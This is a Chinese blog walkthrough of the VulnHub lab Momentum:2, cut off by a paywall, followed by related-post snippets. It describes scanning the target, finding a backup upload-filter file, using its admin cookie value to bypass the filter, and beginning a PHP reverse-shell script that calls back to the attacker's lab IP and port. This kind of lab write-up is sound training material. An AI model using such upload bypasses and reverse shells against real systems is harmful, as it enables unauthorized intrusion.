Momentum:2靶机渗透测试

最新推荐文章于 2024-05-06 15:52:06 发布
最新推荐文章于 2024-05-06 15:52:06 发布
阅读量518 收藏 4
点赞数 2
分类专栏: 打靶记录 文章标签: shell 渗透测试 vulnhub 靶机 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49340699/article/details/118635109
版权

Momentum:2靶机渗透测试

环境

靶机192.168.19.140
kali攻击机192.168.19.131

工具

nmap netdiscover gobuster 御剑 Xshell msf netcat

流程

用netdiscover对目标网段进行扫描
得到目标主机192.168.19.140
在这里插入图片描述使用nmap对该主机进行端口扫描
在这里插入图片描述

得到端口22与80端口是开启的
上80端口看到只有三张图片就对目录进行爆破

gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt

在这里插入图片描述

http://192.168.19.140/dashboard.html为一个上传文件的页面

在这里插入图片描述
尝试上传shell和php文件都失败了
在这里插入图片描述txt文件可以上传
在这里插入图片描述而目录

http://192.168.19.140/owls/则为上传的目录
在这里插入图片描述
http://192.168.19.140/ajax.php是个空网页
查看源码在最下面有几行代码
在这里插入图片描述在这里插入图片描述根据经验这个网页一定有东西果然用御剑扫到
http://192.168.19.140/ajax.php.bak拷贝文件
在这里插入图片描述
打开该文件是段过滤上传文件的代码
在这里插入图片描述
代码审计大概意思就是当满足这个带有cookie键值为admin=&G6u@B6uDXMq&Ms,再加一个大写字符时是可以上传pdf,php,txt文件的
那就直接burpsuite抓包改包
先准备好反弹shell(找了好几个脚本终于这个可以反弹泪目)

<?php   
    error_reporting (E_ERROR);  
    ignore_user_abort(true);  
    ini_set('max_execution_time',0);  
    $os = substr(PHP_OS,0,3);  
    $ipaddr = '192.168.19.131';  
    $port = '1222';  
    $descriptorspec = array(0 => array("pipe","r"),
最低0.47元/天 解锁文章
小王先森&
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
VulnHub靶场-Momentum: 2
hxync的博客
08-10 541
靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没什么有用的信息 dirbuster扫一下目录 发现了一个文件上传的页面 一个备份文件 一个js文件 代码内容大概是当cookie存在且值为后面给出的那个字符串,注释部分有说明还需在字符串后面加一个大写字母,再用POST提交一个secure参数,参数的值
Momentum:复制动量纸
03-20
势头 Denis Chaves(2012)的“ Eureka!一种在日本也能使用的动量策略”中的动量策略复制。
Momentum2-靶机
薛定谔嘚喵博客
04-09 358
靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
Momentum靶机系列Momentum2
最新发布
m0_74950307的博客
05-06 1036
所以只需要上传一个监听代码就可以进行对靶机的监听,而且还获得了root权限:所以运行该脚本,并输入;//使用 open() 方法设置请求的类型为 POST,URL 为 "ajax.php",并指定使用异步方式发送请求(第三个参数为 true)//formData.append() 是 FormData 对象提供的方法,用于向表单数据对象中添加字段和值。简单来说就是,存在文件上传,上传的文件会添加到表单文件中 而且要想上传文件后就需要进行这串代码的过滤。//老板让我在饼干的末尾再添加一个大写字母。
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 634
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
靶机渗透练习81-Momentum:2
hirak0的博客
04-24 1000
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-2,702/ Description Difficulty : medium Keywords : curl, bash, code review This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.79 注:靶机与Kali的IP地址只
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4510
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
momentum:通过动量支持扩展 touchmove
06-21
尚未实施。 这里的想法如下: onTouchMove={momentum(doStuff)} momentum函数给出与onTouchMove通常相同的值,但也会考虑动量 - 因此momentum也会在onTouchEnd事件之后onTouchEnd 。
Momentum:运动的BaaS
05-17
运动的BaaS设置sudo npm install sails -g; sudo npm安装cd前端; npm安装; 凉亭安装; 吞咽cd ../;...Less,Jade,Mongodb公共路线() / auth / signup -post / auth / login -post ```{电子邮件:'字符串',密码:'...
momentum:用于用户界面的模拟物理动画
05-23
var momentum = require ( 'momentum' ) ; var render = require ( 'momentum/render' ) ; momentum . spring ( 300 , function frame ( value ) { render . translateX ( node , value ) ; } , function done ( )...
meteor-momentum:Meteorjs的React性动画包
05-26
借助Momentum,您可以通过易于共享的插件在应用中轻松且简单地重用动画行为。 警告 我们发布此软件包的目的是为了探索一个想法,而不是我们严格维护供公众消费的内容。 因此,我们附带的插件可能无法在野外的许多...
Momentum1-靶机
薛定谔嘚喵博客
04-10 156
靶机通过信息收集发现AES加密秘钥以及XSS漏洞,利用beef-xss工具拿到cookie,解密后得到了账户密码,ssh登录后通过使用linpeas.sh脚本信息收集发现开着Redis,利用redis-cli拿到root密码信息收集发现AES有加密XSS漏洞利用,通过beef-xss工具获得cookie值得到cookie值尝试AES解密得到账户密码redis-cli的使用,获得root密码。
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
Aluxian_的博客
09-09 736
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
vulnhub-Momentum2
plant1234的博客
08-30 519
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
VulnHub靶机_MOMENTUM: 1
学术渣渣的博客
09-02 707
文章目录靶机介绍渗透过程获取靶机ip端口扫描扫描网站目录XSS攻击ssh登录提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/momentum-1,685/ 难度:简单 格式:Virtualbox - OVA 渗透过程 获取靶机ip 首先扫描靶机的IP为192.168.1.107。 arp-scan -l 端口扫描 进行端口扫描,靶机开放了22和80端口。 nmap -A -T4 -p 1-65535 192.168.1.107 扫描网站目录 首先扫描一下这个网站的
靶机渗透练习80-Momentum:1
hirak0的博客
04-21 936
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-1,685/ Description Info: easy / medium 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.78 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如下 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式 将 VMw
靶场练习第二十二天~vulnhub靶场之Momentum-2
qq_57976347的博客
02-20 630
一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share
渗透测试实战-vulnhub靶机 momentum-2
xnxqwzy的博客
07-31 177
查看kali IP地址ip a所在网段为 192.168.74.0/24使用nmap扫描整个网段扫描结果显示靶机地址疑似为 192.168.74.131扫描该地址的端口情况发现只开放了22和80端口尝试访问web服务似乎只是个静态页面查看网页源码没有什么特别的线索扫描整个网站目录这里文件上传到ajax.php进行处理,前端没有任何过滤限制尝试上传一个jpg文件,上传失败,后端存在文件限制查看ajax.php.bak。
redis的安装及简单实用(Linux下)
u013343076的专栏
03-19 849
简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同
momentum : 动量参数如何影响模型训练
05-14
Momentum(动量)是优化算法中的一个参数,它的作用是加速梯度下降的收敛过程,减少训练过程中的震荡或者局部最小值的影响,从而加快模型的训练速度。 具体来说,动量参数会影响模型训练的速度和稳定性。当动量参数设置得过小时,模型训练可能会非常缓慢,甚至可能无法收敛。而当动量参数设置得过大时,模型训练可能会过于迅速,导致模型无法收敛或者出现震荡。 通常来说,动量参数的取值范围为0到1之间,一般建议将其设置为0.9左右。这样可以使优化算法在训练过程中更快地找到全局最优解,同时也能够保证模型训练的稳定性。但是,具体的取值还需要根据具体的任务和数据集来进行调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值